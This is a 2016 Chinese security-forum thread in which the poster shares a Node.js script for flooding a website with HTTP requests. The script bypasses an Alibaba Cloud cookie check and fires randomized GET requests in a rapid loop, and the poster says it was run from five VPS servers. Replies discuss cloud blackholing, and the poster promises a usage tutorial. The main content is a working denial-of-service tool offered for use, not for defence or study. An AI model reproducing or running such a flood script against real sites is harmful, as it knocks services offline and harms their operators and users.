查看: 218266|回复: 1637

一个脚本能打死阿里云

[复制链接]
  • TA的每日心情
    慵懒
    2016-9-1 15:34
  • 签到天数: 8 天

    [LV.3]偶尔看看II

    发表于 2016-1-10 00:16:24 | 显示全部楼层 |阅读模式
       之前在公司上班没事,学习nodejs ,  可以说压力山大,因学的 建筑工程技术 毕业  ,转行做互联网安全,对于我这种小白,哎!!
       本脚本 需要 nodejs 脚本代码 VPS 服务器 。当时我采用了5台服务器 基本上,能打死。。。。
      
       虽然有cookie 验证机制,照样能绕过。。
      PS:本人小白,大牛勿喷!!  贴代码 。睡觉

    代码截图:

    脚本代码

    脚本代码



    [JavaScript] 纯文本查看 复制代码
    /*
      By:不良人
    */
    
    console.log('Hello world');  //请无视输出!
    var http = require('http');
    var complete = 0;
    var atkCount = 20;
    function getCookie() {
        var options = {
            hostname: '对方域名或者IP', //仅限制网站
            port: 80, //默认80端口
            path: '这个我就不用说了吧!',
            agent: false,
            Conntion: 'Keep-Alive'
        };
        http.get(options, function (res) {
            console.log("Got response: " + res.statusCode);
            //   console.log(res.headers['set-cookie']);
            var src = res.headers['set-cookie'][0];
            var s1 = '=';
            var start = src.indexOf(s1);
            var end = src.indexOf(";");
            var cookie = src.substring(start + 1, end);
            //    console.log(src);
            //    console.log(cookie);
            getData(cookie);
        }).on('error', function (e) {
            console.log("Got error: " + e.message);
        });
    }
    function getData(cookie) {
        var hf_key_str = 'hf_skey = 2693953.2693953..1447381409.1.3971aafb8bd532f20976867edde553b2;';  //请更改抓包值
        var c1 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + hf_key_str + ' path=/;QCLOUD=a';       
        var c2 = 'aliyungf_tc=' + cookie + '; ' + 'HttpOnly;' + ' path=/;QCLOUD=a';
        var options = {
            hostname: '对方域名或者IP',
            port: 80,
            path: '网站路径路径',
            agent: false,
            Conntion: 'Keep-Alive',
            Cookie: c2
        };
        http.get(options, function (res) {
            console.log("Got response: " + res.statusCode);
            if (res.statusCode == 200) {
                complete += 1;
                console.log('complete = ' + complete);
            }
        }).on('error', function (e) {
            console.log("Got error: " + e.message);
        });
        // console.log(cookie);
    }
    function start() {
        getCookie();
    }
    /*
    setInterval(() => {
        console.log('test');
    }, 1000);
    */
    function access() {
        var aa = '/index/getBoat/'; //请更改
        aa += Math.random() + '/';
        aa += Math.random() + '/';
        /*
        aa += '13';
        for (var i = 0; i < 9; i++) {
            aa += (Math.random() % 10 );
        }
        */
        aa += '/';
        aa += Math.random() + '/';
        aa += Math.random() + '/';
        aa += Math.random() + '/';
        aa += Math.random() + '/';
        aa += Math.random();
        //  var aa = '/index/getPwd/' + Math.random() + '/';
        var options = {
            hostname: '请更改',
            port: 80,
            path: aa,
            agent: false,
            Conntion: 'Keep-Alive'
        };
        http.get(options, function (res) {
            console.log("Got response: " + res.statusCode);
            if (res.statusCode == 200) {
                complete += 1;
                console.log('complete = ' + complete);
            }
        }).on('error', function (e) {
            console.log("Got error: " + e.message);
        });
    }
    setInterval(function () {
        start();
        //  access();
    }, 1 / atkCount);

    评分

    参与人数 2i币 +25 收起 理由
    xiaoye + 8 支持原创
    浮尘 + 17 支持原创

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    前天 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-1-10 00:45:42 | 显示全部楼层
    阿里号称5G防护,但实际是打一点过去就会直接进黑洞的

    点评

    老大,说的没错,可以让对方直接黑洞崩溃!!  详情 回复 发表于 2016-1-10 22:37
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-1-16 21:33
  • 签到天数: 175 天

    [LV.7]常住居民III

    发表于 2016-1-10 01:12:47 | 显示全部楼层
    额,这个怎么说呢,我觉得阿里内网打可能还有效,但是外网直接打,可能并没有什么效果。
    很多时候,你的访问频率过高的情况下,直接ban掉你就OK了。
    也有很多时候,直接会做熔断器,比如最常用的反复去get restful api。
    在SOA架构的时候,很多都会在这里直接做一个熔断,打过来都直接被废弃了,除非你要耗尽硬件资源

    点评

    这么怎么说呢!等过段时间有钱了,买点服务器,录个教程发给你们!  详情 回复 发表于 2016-1-10 22:38
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-10 05:11:13 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-1-10 07:04:53 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-10 09:19:10 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-4-15 09:19
  • 签到天数: 66 天

    [LV.6]常住居民II

    发表于 2016-1-10 09:44:49 | 显示全部楼层
    关键是怎么使用了???

    点评

    后期我会,录制一个视频!  详情 回复 发表于 2016-1-10 22:38
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-1-11 02:59
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2016-1-10 18:31:29 | 显示全部楼层
    额,涨姿势了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-9-1 15:34
  • 签到天数: 8 天

    [LV.3]偶尔看看II

     楼主| 发表于 2016-1-10 22:37:10 | 显示全部楼层
    90_ 发表于 2016-1-10 00:45
    阿里号称5G防护,但实际是打一点过去就会直接进黑洞的

    老大,说的没错,可以让对方直接黑洞崩溃!!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-9-1 15:34
  • 签到天数: 8 天

    [LV.3]偶尔看看II

     楼主| 发表于 2016-1-10 22:38:03 | 显示全部楼层
    Antergone 发表于 2016-1-10 01:12
    额,这个怎么说呢,我觉得阿里内网打可能还有效,但是外网直接打,可能并没有什么效果。
    很多时候,你的访 ...

    这么怎么说呢!等过段时间有钱了,买点服务器,录个教程发给你们!

    点评

    静等教程  详情 回复 发表于 2016-1-23 23:16
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-15 07:17 , Processed in 0.044785 second(s), 23 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部